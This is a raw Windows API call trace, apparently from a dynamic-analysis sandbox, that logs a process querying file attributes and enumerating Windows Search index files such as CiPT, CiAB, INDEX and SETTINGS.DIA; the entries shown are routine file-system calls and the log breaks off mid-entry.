GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.618] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", lpFilePart=0x0) returned 0x67 [0252.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002"), fInfoLevelId=0x0, lpFileInformation=0x7019d7c | out: lpFileInformation=0x7019d7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.619] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", lpFilePart=0x0) returned 0x67 [0252.619] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", lpFilePart=0x0) returned 0x67 [0252.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.620] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002", lpFilePart=0x0) returned 0x67 [0252.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.620] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", lpFilePart=0x0) returned 0x5a [0252.620] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\", lpFilePart=0x0) returned 0x5b [0252.620] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.620] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.620] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 1 [0252.621] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.621] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.621] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", lpFilePart=0x0) returned 0x5a [0252.621] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\", lpFilePart=0x0) returned 0x5b [0252.621] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.621] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.621] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 1 [0252.622] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 0 [0252.622] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.628] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.628] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299f0de0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299f0de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.000", cAlternateFileName="")) returned 1 [0252.628] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.001", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.002", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.000", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.001", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.002", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299f0de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.000", cAlternateFileName="")) returned 1 [0252.629] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.001", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.002", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.000", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.001", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.002", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 1 [0252.630] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 0 [0252.630] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.632] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.632] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299f0de0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299f0de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.000", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.001", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.002", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.000", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.001", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.002", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299f0de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.000", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.001", cAlternateFileName="")) returned 1 [0252.633] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.002", cAlternateFileName="")) returned 1 [0252.634] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, 